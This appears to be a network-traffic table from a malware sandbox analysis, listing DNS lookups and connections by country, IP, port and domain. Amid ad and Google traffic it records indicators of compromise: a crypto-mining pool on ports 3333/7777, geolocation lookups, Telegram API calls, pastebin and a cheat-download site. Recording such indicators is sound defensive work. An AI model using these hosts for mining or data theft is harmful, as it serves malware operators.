| RU | 77.88.21.179:443 | ads.adfox.ru | tcp |
| RU | 87.250.247.181:443 | avatars.mds.yandex.net | tcp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| RU | 77.88.21.90:443 | an.yandex.ru | tcp |
| RU | 77.88.21.90:443 | an.yandex.ru | tcp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| RU | 77.88.21.90:443 | an.yandex.ru | tcp |
| US | 8.8.8.8:53 | ysa-static.passport.yandex.ru | udp |
| US | 8.8.8.8:53 | px.arcspire.io | udp |
| US | 8.8.8.8:53 | ads.betweendigital.com | udp |
| US | 8.8.8.8:53 | acint.net | udp |
| RU | 93.158.134.36:443 | favicon.yandex.net | tcp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | cm.a.mts.ru | udp |
| US | 8.8.8.8:53 | dm.hybrid.ai | udp |
| US | 8.8.8.8:53 | dmg.digitaltarget.ru | udp |
| US | 8.8.8.8:53 | dsp.mpartner.digital | udp |
| GB | 35.177.4.157:443 | px.arcspire.io | tcp |
| NL | 188.42.34.64:443 | ads.betweendigital.com | tcp |
| RU | 185.65.149.228:443 | cm.a.mts.ru | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| RU | 193.3.184.135:443 | acint.net | tcp |
| NL | 37.230.131.22:443 | dm.hybrid.ai | tcp |
| NL | 37.230.131.22:443 | dm.hybrid.ai | tcp |
| RU | 185.15.175.130:443 | dmg.digitaltarget.ru | tcp |
| RU | 194.226.130.227:443 | cm.tns-counter.ru | tcp |
| RU | 84.38.189.44:443 | dsp.mpartner.digital | tcp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sync.dmp.otm-r.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | ad.mail.ru | udp |
| RU | 77.88.21.90:443 | an.yandex.ru | tcp |
| IE | 108.128.43.116:443 | dpm.demdex.net | tcp |
| GB | 142.250.179.226:443 | cm.g.doubleclick.net | tcp |
| GB | 142.250.179.226:443 | cm.g.doubleclick.net | tcp |
| GB | 142.250.179.226:443 | cm.g.doubleclick.net | tcp |
| RU | 194.55.244.182:443 | sync.dmp.otm-r.com | tcp |
| RU | 95.163.41.56:443 | ad.mail.ru | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | euw-ice.360yield.com | udp |
| US | 8.8.8.8:53 | exchange.buzzoola.com | udp |
| BE | 23.14.90.73:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | eye.targetads.io | udp |
| IE | 34.253.100.199:443 | euw-ice.360yield.com | tcp |
| RU | 51.250.77.168:443 | eye.targetads.io | tcp |
| DE | 167.235.7.148:443 | exchange.buzzoola.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | gw-iad-bid.ymmobi.com | udp |
| US | 8.8.8.8:53 | ssp-rtb.sape.ru | udp |
| US | 8.8.8.8:53 | kimberlite.io | udp |
| US | 8.8.8.8:53 | match.new-programmatic.com | udp |
| US | 8.8.8.8:53 | 9291008571717666613673.cm.a.mts.ru | udp |
| RU | 217.199.220.43:443 | kimberlite.io | tcp |
| US | 8.8.8.8:53 | mitdmp.whiteboxdigital.ru | udp |
| RU | 193.3.184.213:443 | ssp-rtb.sape.ru | tcp |
| RU | 217.65.2.150:443 | match.new-programmatic.com | tcp |
| RU | 81.163.17.245:443 | mitdmp.whiteboxdigital.ru | tcp |
| US | 8.8.8.8:53 | nr.bidderstack.com | udp |
| US | 8.8.8.8:53 | 179.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.247.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.4.177.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.34.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.129.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.149.65.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.131.230.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.130.226.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.175.15.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.184.3.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.189.38.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.43.128.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.244.55.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.41.163.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.100.253.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.7.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.103.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.77.250.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | profile.ssp.rambler.ru | udp |
| DE | 94.130.221.58:443 | nr.bidderstack.com | tcp |
| RU | 91.192.148.30:443 | profile.ssp.rambler.ru | tcp |
| US | 8.8.8.8:53 | px.adhigh.net | udp |
| US | 8.8.8.8:53 | rtb-eu-warsaw.intent.ai | udp |
| RU | 193.232.150.60:443 | px.adhigh.net | tcp |
| US | 47.253.61.56:443 | gw-iad-bid.ymmobi.com | tcp |
| US | 8.8.8.8:53 | s.uuidksinc.net | udp |
| RU | 81.163.17.245:443 | mitdmp.whiteboxdigital.ru | tcp |
| US | 8.8.8.8:53 | shopnetic.com | udp |
| US | 8.8.8.8:53 | downloader.disk.yandex.ru | udp |
| NL | 185.98.54.153:443 | s.uuidksinc.net | tcp |
| US | 8.8.8.8:53 | sm.rtb.mts.ru | udp |
| RU | 77.88.21.127:443 | downloader.disk.yandex.ru | tcp |
| RU | 217.66.147.35:443 | sm.rtb.mts.ru | tcp |
| RU | 217.66.147.35:443 | sm.rtb.mts.ru | tcp |
| RU | 23.111.37.244:443 | shopnetic.com | tcp |
| US | 8.8.8.8:53 | sonar.semantiqo.com | udp |
| US | 8.8.8.8:53 | ssp.adriver.ru | udp |
| FI | 95.217.109.66:443 | sonar.semantiqo.com | tcp |
| RU | 195.209.111.13:443 | ssp.adriver.ru | tcp |
| RU | 195.209.111.13:443 | ssp.adriver.ru | tcp |
| US | 8.8.8.8:53 | sync.bumlam.com | udp |
| DE | 31.172.81.147:443 | sync.bumlam.com | tcp |
| DE | 31.172.81.147:443 | sync.bumlam.com | tcp |
| US | 8.8.8.8:53 | vma.mts.ru | udp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| RU | 217.66.147.42:443 | vma.mts.ru | tcp |
| RU | 217.66.147.42:443 | vma.mts.ru | tcp |
| RU | 88.212.201.204:443 | counter.yadro.ru | tcp |
| US | 8.8.8.8:53 | sync.gonet-ads.com | udp |
| US | 8.8.8.8:53 | s1033sas.storage.yandex.net | udp |
| NL | 188.42.105.236:443 | sync.gonet-ads.com | tcp |
| US | 8.8.8.8:53 | sync.upravel.com | udp |
| US | 8.8.8.8:53 | x01.aidata.io | udp |
| DE | 136.243.48.22:443 | sync.upravel.com | tcp |
| US | 8.8.8.8:53 | yandex-dmp-sync.rutarget.ru | udp |
| RU | 89.108.119.28:443 | x01.aidata.io | tcp |
| RU | 141.8.182.91:443 | s1033sas.storage.yandex.net | tcp |
| US | 8.8.8.8:53 | yandex-sync.rutarget.ru | udp |
| RU | 188.72.107.228:443 | yandex-sync.rutarget.ru | tcp |
| US | 8.8.8.8:53 | tech.rtb.mts.ru | udp |
| RU | 94.139.255.195:443 | yandex-sync.rutarget.ru | tcp |
| RU | 213.87.44.187:443 | tech.rtb.mts.ru | tcp |
| RU | 213.87.44.187:443 | tech.rtb.mts.ru | tcp |
| US | 8.8.8.8:53 | 150.2.65.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.184.3.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.220.199.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.221.130.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.148.192.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.150.232.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.54.98.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.61.253.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.66.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.37.111.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.109.217.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.111.209.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.81.172.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.147.66.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.201.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.105.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.48.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.119.108.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.182.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.dsp.solta.io | udp |
| RU | 217.199.220.72:443 | sync.dsp.solta.io | tcp |
| US | 8.8.8.8:53 | 228.107.72.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.44.87.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.255.139.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.220.199.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | solta-sync.rutarget.ru | udp |
| RU | 178.170.195.115:443 | solta-sync.rutarget.ru | tcp |
| US | 8.8.8.8:53 | redirect.frontend.weborama.fr | udp |
| US | 35.190.24.218:443 | redirect.frontend.weborama.fr | tcp |
| US | 8.8.8.8:53 | a.utraff.com | udp |
| US | 8.8.8.8:53 | 115.195.170.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.24.190.35.in-addr.arpa | udp |
| US | 104.26.7.189:443 | a.utraff.com | tcp |
| US | 8.8.8.8:53 | 189.7.26.104.in-addr.arpa | udp |
| NL | 74.125.8.72:443 | rr3---sn-5hneknee.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr2---sn-5hnekn7d.googlevideo.com | udp |
| NL | 209.85.226.39:443 | rr2---sn-5hnekn7d.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr2---sn-5hne6nsd.googlevideo.com | udp |
| NL | 172.217.132.7:443 | rr2---sn-5hne6nsd.googlevideo.com | udp |
| US | 8.8.8.8:53 | 39.226.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.132.217.172.in-addr.arpa | udp |
| NL | 74.125.100.201:443 | rr4---sn-5hne6nz6.googlevideo.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | rr2---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.199:443 | rr2---sn-5hnednss.googlevideo.com | udp |
| US | 8.8.8.8:53 | 199.132.217.172.in-addr.arpa | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | rr2---sn-5hne6nz6.googlevideo.com | udp |
| NL | 74.125.100.199:443 | rr2---sn-5hne6nz6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 199.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hnekn7d.googlevideo.com | udp |
| NL | 209.85.226.40:443 | rr3---sn-5hnekn7d.googlevideo.com | udp |
| US | 8.8.8.8:53 | 40.226.85.209.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| US | 8.8.8.8:53 | udp | |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| RU | 93.158.134.242:443 | dr.yandex.net | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 192.178.49.195:443 | udp | |
| US | 8.8.8.8:53 | 195.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | rr5---sn-5hne6nsr.googlevideo.com | udp |
| NL | 172.217.132.74:443 | rr5---sn-5hne6nsr.googlevideo.com | udp |
| US | 8.8.8.8:53 | 74.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 192.178.49.195:443 | udp | |
| US | 8.8.8.8:53 | 6.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-5hne6nsz.googlevideo.com | udp |
| NL | 74.125.100.74:443 | rr5---sn-5hne6nsz.googlevideo.com | udp |
| US | 8.8.8.8:53 | 74.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-5hneknes.googlevideo.com | udp |
| NL | 74.125.8.201:443 | rr4---sn-5hneknes.googlevideo.com | udp |
| US | 8.8.8.8:53 | 201.8.125.74.in-addr.arpa | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | blobcomments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | content.googleapis.com | udp |
| GB | 172.217.169.74:443 | content.googleapis.com | tcp |
| GB | 142.250.180.10:443 | content.googleapis.com | tcp |
| GB | 142.250.180.10:443 | content.googleapis.com | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 172.217.169.74:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| GB | 216.58.201.106:443 | peoplestackwebexperiments-pa.clients6.google.com | tcp |
| GB | 216.58.201.106:443 | peoplestackwebexperiments-pa.clients6.google.com | tcp |
| GB | 216.58.201.106:443 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| CA | 172.217.165.3:443 | beacons2.gvt2.com | tcp |
| CA | 172.217.165.3:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 3.165.217.172.in-addr.arpa | udp |
| US | 192.178.49.195:443 | udp | |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.1.100:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 100.1.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:3333 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 45.76.89.70:7777 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 172.67.70.233:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 233.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | e2c12.gcp.gvt2.com | udp |
| PL | 34.118.72.152:443 | e2c12.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 152.72.118.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 172.67.70.233:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| GB | 142.250.178.14:443 | www.youtube.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| N/A | 127.0.0.1:54255 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 44.237.65.238:443 | shavar.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.65.237.44.in-addr.arpa | udp |
| N/A | 127.0.0.1:54261 | tcp | |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| GB | 142.250.178.14:443 | www.youtube.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| GB | 142.250.178.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 172.67.70.233:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 172.217.16.227:443 | id.google.com | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cheats-pack.ru | udp |
| RU | 31.31.198.49:443 | cheats-pack.ru | tcp |
| RU | 31.31.198.49:443 | cheats-pack.ru | tcp |
| US | 8.8.8.8:53 | unpkg.com | udp |
| US | 104.17.247.203:443 | unpkg.com | tcp |
| US | 8.8.8.8:53 | 49.198.31.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.212.202:443 | content-autofill.googleapis.com | udp |
| GB | 216.58.212.202:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 104.17.247.203:443 | unpkg.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.247.203:443 | unpkg.com | tcp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| RU | 31.31.198.49:443 | cheats-pack.ru | tcp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 8.8.8.8:53 | linkify.ru | udp |
| US | 104.21.36.81:443 | linkify.ru | tcp |
| US | 104.21.36.81:443 | linkify.ru | udp |
| US | 8.8.8.8:53 | 171.211.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.36.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | minimal-assets-api.vercel.app | udp |
| US | 76.76.21.9:443 | minimal-assets-api.vercel.app | tcp |
| US | 8.8.8.8:53 | 119.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.21.76.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | vitals.vercel-insights.com | udp |
| US | 8.8.8.8:53 | kernel.linkify.ru | udp |
| US | 8.8.8.8:53 | api.iconify.design | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| IE | 108.128.159.11:443 | vitals.vercel-insights.com | tcp |
| US | 104.26.12.204:443 | api.iconify.design | tcp |
| US | 104.26.12.204:443 | api.iconify.design | tcp |
| US | 104.26.12.204:443 | api.iconify.design | tcp |
| US | 104.21.36.81:443 | kernel.linkify.ru | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 104.21.36.81:443 | kernel.linkify.ru | udp |
| US | 8.8.8.8:53 | 204.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.159.128.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.linkify.ru | udp |
| US | 172.67.190.103:443 | api.linkify.ru | tcp |
| US | 172.67.190.103:443 | api.linkify.ru | tcp |
| US | 172.67.190.103:443 | api.linkify.ru | tcp |
| US | 8.8.8.8:53 | 103.190.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| RU | 31.31.198.49:443 | cheats-pack.ru | tcp |
| US | 104.17.247.203:443 | unpkg.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| IE | 108.128.159.11:443 | vitals.vercel-insights.com | tcp |
| US | 172.67.211.171:443 | ify.ac | udp |
| US | 76.76.21.9:443 | minimal-assets-api.vercel.app | tcp |
| IE | 108.128.159.11:443 | vitals.vercel-insights.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| IE | 108.128.159.11:443 | vitals.vercel-insights.com | tcp |
| US | 8.8.8.8:53 | 77.255.255.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| RU | 213.180.193.90:443 | an.yandex.ru | tcp |
| RU | 87.250.247.182:443 | avatars.mds.yandex.net | tcp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| RU | 93.158.134.36:443 | favicon.yandex.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| US | 8.8.8.8:53 | storage.mds.yandex.net | udp |
| RU | 213.180.204.158:443 | storage.mds.yandex.net | tcp |
